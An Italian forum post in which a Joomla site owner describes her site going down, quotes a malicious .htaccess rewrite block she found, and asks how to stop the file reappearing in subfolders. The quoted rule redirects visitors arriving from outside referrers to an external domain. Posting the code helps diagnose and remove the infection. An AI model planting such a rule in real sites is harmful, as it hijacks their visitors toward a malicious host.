Salve a tutti;
ieri il mio sito è stato down per tutto il pomeriggio:
- ho controllato il db e stava tutto a posto
- ho controllato i permessi delle cartelle ed anche quelli stavano ok
- nessuno degli editor del sito aveva fatto modifiche nel pomeriggio quindi non si capiva cosa era successo.
A senso ho visto, tramite Filezilla, quali erano gli ultimi files che avevano subito modifica.
Era presente il file .htaccess modificato intorno alle 15.00... l'ho aperto con l'editor e ci ho trovato dentro questa sorpresina:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://darwinawards.fr/wami.html?h=1291289 [L,R]
</IfModule>
mi sono informata sul web ed ho trovato questo forum che ne parla, dice che è un tipo hijacking
http://www.betaarchive.com/forum/viewtopic.php?t=27202li per li mi sono limitata a cancellare il file .htaccess dalla root del sito e tutto è tornato online e funzionante...
MA questo files me lo vedo replicato un pò in tutte le cartelle (libraries, includes, etc...), sembra quasi che si replica da solo (e lo dicono anche del forum del link postato sopra).. io lo cancello e quello al primo F5 riciccia!
Così ho tagliato la testa al toro, dopo un piccolo backup, ed ho reistallato tutta la piattaforma da zero, scaricandomi ex novo i pacchetti della versione dal sito joomla e sovrascrivendole alle vecchie cartelle.
Peccato che non sia servito nulla!
Malgrado nella root non ci sia più l'ombra di questo .htaccess "infetto" e che il sito sia perfettamente online e funzionante, nelle altre cartelle continua a comparire questo file!!!
Come posso liberarmi definitivamente di questo "ospite indesiderato"?
Qualcuno ha avuto a che fare con questo tipo di hijack?